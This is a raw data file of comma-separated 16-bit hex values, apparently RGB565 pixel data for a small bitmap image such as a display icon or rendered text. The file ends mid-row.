0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffdf, 0xffdf, 0xffbe, 0xff7e, 0xff9e, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffde, 0xffbe, 0xffdf, 0xffbe, 0xffbe, 0xffbe, 0xffbe, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xf7bd, 0xfffe, 0xffbd, 0xffdd, 0xffdd, 0xfffe, 0xfffe, 0xffde, 0xf7de, 0xffff, 0xffff, 0xf7de, 0xfffe, 0xffbd, 0xfffe, 0xffdd, 0xffbd, 0xfffe, 0xffde, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffdd, 0xffdd, 0xfffd, 0xffde, 0xffde, 0xffff, 0xffff, 0xffdf, 0xf7bf, 0xf7df, 0xffff, 0xffff, 0xffbe, 0xfffe, 0xfffe, 0xffff, 0xf7be, 0xf7df, 0xf7df, 0xf7df, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7be, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7be, 0xf7be, 0xffff, 0xffff, 0xf7bd, 0xffff, 0xffdf, 0xf7de, 0xffff, 0xf7df, 0xffff, 0xf7fe, 0xfffe, 0xfffe, 0xffdd, 0xffbd, 0xffde, 0xffde, 0xff9e, 0xffdf, 0xffdd, 0xfffd, 0xfffe, 0xffff, 0xf7be, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffbf, 0xffbf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7fe, 0xf7df, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7fd, 0xfffe, 0xfffe, 0xffde, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffde, 0xffff, 0xffde, 0xffff, 0xffde, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xffdd, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffbf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xf7df, 0xffde, 0xffdd, 0xffde, 0xffde, 0xffbd, 0xffde, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7df, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffdd, 0xfffe, 0xffff, 0xffff, 0xffde, 0xffff, 0xf7df, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7be, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xf7de, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xf7be, 0xffbe, 0xffde, 0xffdf, 0xffdf, 0xffbe, 0xffdd, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xf7df, 0xffff, 0xdf3d, 0xe77d, 0xefde, 0xdf3c, 0xdf5c, 0xdf1c, 0xffff, 0xf7de, 0xffff, 0xf7df, 0xf7de, 0xc639, 0xffdf, 0xff9f, 0xf7de, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xf7df, 0xd6fb, 0xf7ff, 0xe75d, 0xdf1c, 0xdefc, 0xe71c, 0xffff, 0xf7ff, 0xefde, 0xf7ff, 0xce9a, 0xd6fb, 0xf7ff, 0xf7de, 0xf7de, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xdf5c, 0xe71c, 0xe73c, 0xdf1b, 0xd6ba, 0xd6da, 0xefde, 0xf7fe, 0xffff, 0xef9d, 0xce99, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7de, 0xffff, 0xf7de, 0xffff, 0xffdf, 0xe71c, 0xdf1b, 0xf7be, 0xdf1c, 0xdefc, 0xdefc, 0xf7df, 0xf7bf, 0xefbf, 0xffff, 0xef9f, 0xe6fb, 0xe6db, 0xffbe, 0xffdf, 0xffbe, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe73d, 0xef9e, 0xe75d, 0xe79d, 0xffff, 0xffff, 0xffff, 0xf7be, 0xef5d, 0xf79e, 0xd67a, 0xffff, 0xd69a, 0xf7be, 0xffff, 0xe75c, 0xdf1c, 0xf79e, 0xe71c, 0xef5d, 0xffff, 0xffdf, 0xd6ba, 0xef5d, 0xf7be, 0xffdf, 0xef7d, 0xf79e, 0xffff, 0xffff, 0xce59, 0xef7c, 0xfffe, 0xd6ba, 0xffff, 0xe73d, 0xffff, 0xf7df, 0xffff, 0xe75d, 0xce9a, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xd6da, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xf7fe, 0xe75c, 0x94d3, 0xbdf8, 0xb596, 0xc5f8, 0x9471, 0xc618, 0xffff, 0xad75, 0xad55, 0xa514, 0x94b3, 0xad55, 0x9cf4, 0xdf1b, 0xffff, 0xffff, 0xffde, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffde, 0xfffe, 0xfffe, 0xffff, 0xffff, 0x8cb2, 0xc659, 0x94f3, 0xc679, 0xbe38, 0x8c71, 0xffff, 0xe73d, 0x94b3, 0xad56, 0x9cb3, 0xad35, 0xa535, 0xb5d7, 0xffff, 0xffdf, 0xfffe, 0xffff, 0xffff, 0xf7fe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xefdf, 0x9d96, 0xce79, 0x94b2, 0xc638, 0xd6db, 0x9d14, 0xffff, 0xc679, 0x9d35, 0xefbe, 0x7c10, 0xffff, 0x8c71, 0xdeda, 0xffff, 0xffff, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffde, 0xffff, 0xef5c, 0x8c91, 0xad75, 0xce7a, 0x8c92, 0xd6bb, 0x9492, 0xe6fc, 0xb596, 0x9472, 0xad55, 0xbd96, 0xb5f8, 0xb5b7, 0x9d15, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xd69a, 0x9493, 0xf79e, 0x94d3, 0xb5b6, 0xc638, 0xc638, 0xf7be, 0x83ef, 0xbdd6, 0x9492, 0xad55, 0xce79, 0x8c50, 0xffff, 0xc637, 0xa514, 0xce79, 0xce79, 0xc638, 0xc638, 0x9492, 0xffdf, 0x9cd3, 0x9492, 0xbdd7, 0xc638, 0xa534, 0x8c71, 0xe71c, 0xce9a, 0xa534, 0xb5b5, 0xdefb, 0x8c91, 0x8c51, 0xd69a, 0xf7bf, 0x9493, 0xbdd8, 0xad35, 0x9492, 0xbdf8, 0x94b3, 0xdefc, 0xce9a, 0x94f4, 0x9d14, 0x6b8d, 0xad75, 0x9cf3, 0xef7d, 0xffff, 0xf7df, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xfffd, 0xad95, 0xef5d, 0xbd97, 0xb556, 0xce39, 0x9c92, 0xd638, 0xffde, 0xad13, 0xc5f7, 0x8c51, 0xe71c, 0xa534, 0x9cf3, 0xef1c, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe73c, 0xb5b6, 0xef5d, 0x8c91, 0xce79, 0xd67a, 0x9471, 0xffff, 0xef1c, 0xad14, 0x9c92, 0xce19, 0xde7a, 0x7bcf, 0xd67a, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0xb5d8, 0xdefb, 0xce59, 0xdedb, 0x9cf4, 0xdefc, 0xffff, 0xffff, 0xad35, 0xe71c, 0xad55, 0xd69a, 0xd699, 0xffff, 0xf7bd, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xef7d, 0x9492, 0xbdd7, 0xbdd7, 0xb5b6, 0xbdf7, 0x9cd3, 0xffff, 0xad34, 0xdeba, 0xc5d6, 0xbd95, 0xad97, 0xadb7, 0xad97, 0xf7ff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffbf, 0xffdf, 0xffff, 0xb576, 0x9472, 0xa4f3, 0xb596, 0xa554, 0xa534, 0x8c70, 0xffff, 0xa514, 0x9cd3, 0xd69a, 0xd679, 0x8c50, 0xc658, 0xef9d, 0xdefa, 0x8c71, 0xe75c, 0x94d2, 0xf7df, 0xb596, 0xbdd7, 0xf79e, 0xc618, 0x6b6d, 0xc638, 0x9cd3, 0xef5d, 0xb5b6, 0xdefb, 0xad75, 0xad75, 0xbdf7, 0x9cd3, 0x9cd3, 0xffdf, 0x9492, 0xef3d, 0xce39, 0xad55, 0xb596, 0xbdb6, 0xc617, 0xbdd6, 0xf7be, 0x9cf3, 0xd6ba, 0xe73d, 0xa513, 0xffff, 0xa4f3, 0xef3c, 0xffdf, 0xffbe, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xfffe, 0xef1c, 0xd639, 0xdebc, 0xc5f9, 0xd69b, 0xb596, 0xdefb, 0xffff, 0xad54, 0xef7d, 0x9492, 0xce39, 0x9492, 0xe73c, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xc639, 0xe73d, 0xa515, 0xc5f8, 0xad55, 0xad35, 0xffff, 0xe71c, 0xce59, 0xce59, 0xb596, 0xb5b7, 0xbdd7, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xe71c, 0xc619, 0xc618, 0xad55, 0xb596, 0xc618, 0xc618, 0xef3d, 0xad35, 0xb596, 0x9cb3, 0x8c52, 0xa535, 0xa534, 0xad96, 0xffff, 0xf7de, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xef9e, 0xa554, 0xce99, 0xbdf7, 0xad55, 0xd699, 0xad54, 0xf79d, 0xb595, 0xa4f3, 0xb554, 0xc5f7, 0xdefc, 0xdefb, 0xad76, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xdebc, 0xce7a, 0xb596, 0xe73c, 0xc618, 0xce58, 0xad75, 0xffff, 0xad55, 0xc5f8, 0xa535, 0xce39, 0x8c51, 0xbdd7, 0xdefb, 0xc658, 0xdefb, 0x73ae, 0xffff, 0x8410, 0xd6ba, 0xa534, 0xf7be, 0xad75, 0xc618, 0xa534, 0xbdd7, 0xbdd7, 0xad55, 0xe73c, 0xce79, 0xb5b6, 0xa515, 0xd69a, 0xce59, 0xc618, 0xce59, 0xffff, 0xdeda, 0xbdf7, 0x83ef, 0xef5c, 0xbdd6, 0xc637, 0xffff, 0xa513, 0xb595, 0xbdf7, 0x8c71, 0xc638, 0x8c51, 0xef5d, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbe, 0xffdf, 0xf75d, 0xd65a, 0xad56, 0xa536, 0x9d15, 0x94f4, 0xadb6, 0xffff, 0x9d34, 0xc638, 0x9cf3, 0xd67a, 0xad75, 0xbdb6, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xc618, 0xc639, 0xdedb, 0xce39, 0xbdb7, 0xce39, 0xd65a, 0xe73c, 0xbdf7, 0x94d3, 0xc639, 0xc659, 0x8c92, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbe, 0xf77e, 0xef3c, 0xc618, 0x738e, 0x7bcf, 0xc639, 0xdefb, 0xffdf, 0xf7be, 0xe71c, 0x9cf3, 0xffff, 0xa535, 0xffff, 0xf79f, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xf7df, 0xffff, 0xe75d, 0x8c51, 0x9cd3, 0xd6ba, 0x94b2, 0xce9a, 0x8c71, 0xef7e, 0xa535, 0xdefb, 0xb5d7, 0xa576, 0xad33, 0xa4d2, 0xad54, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xce5a, 0x73d0, 0xbe18, 0x9d14, 0xce79, 0xce9a, 0xa534, 0xffdf, 0xa535, 0xbdf8, 0xbdd8, 0xef3d, 0x5acc, 0xdefc, 0xf7be, 0xd6ba, 0xc618, 0x8430, 0xce9a, 0x8430, 0xc638, 0xb596, 0xffff, 0xc638, 0xa534, 0xce79, 0xc638, 0xb596, 0xbdf7, 0xffff, 0xbdd7, 0xbdd7, 0xb555, 0xc5d7, 0xa514, 0xad76, 0xbdd7, 0xf7be, 0xb5b6, 0xad95, 0xad95, 0x6bad, 0x94b1, 0xffff, 0xffff, 0x9cd3, 0xad55, 0xbdd7, 0x94b2, 0xbe38, 0x8451, 0xef7e, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xce39, 0xc618, 0xce59, 0xdefc, 0xdf1c, 0xd6db, 0xb5d7, 0xffff, 0x8c92, 0xffdf, 0xb596, 0x94b2, 0x8c91, 0xf7df, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x7bf0, 0xffdf, 0xad76, 0xdedc, 0xb5b7, 0xad56, 0xffff, 0xa535, 0xdedb, 0xe75d, 0x8c92, 0x8c92, 0xce7a, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0x9cd2, 0x9d13, 0xd6ba, 0xe75c, 0x94d2, 0x9cd2, 0xef9d, 0xffff, 0x8430, 0xd6da, 0xe73c, 0xad55, 0xffff, 0xa514, 0xffdf, 0xffbf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xb5b6, 0xdefb, 0xffde, 0xbdf7, 0xf79e, 0xa555, 0xffff, 0xa555, 0x8cb3, 0xd71c, 0x8472, 0xfffe, 0xffde, 0xbdb5, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 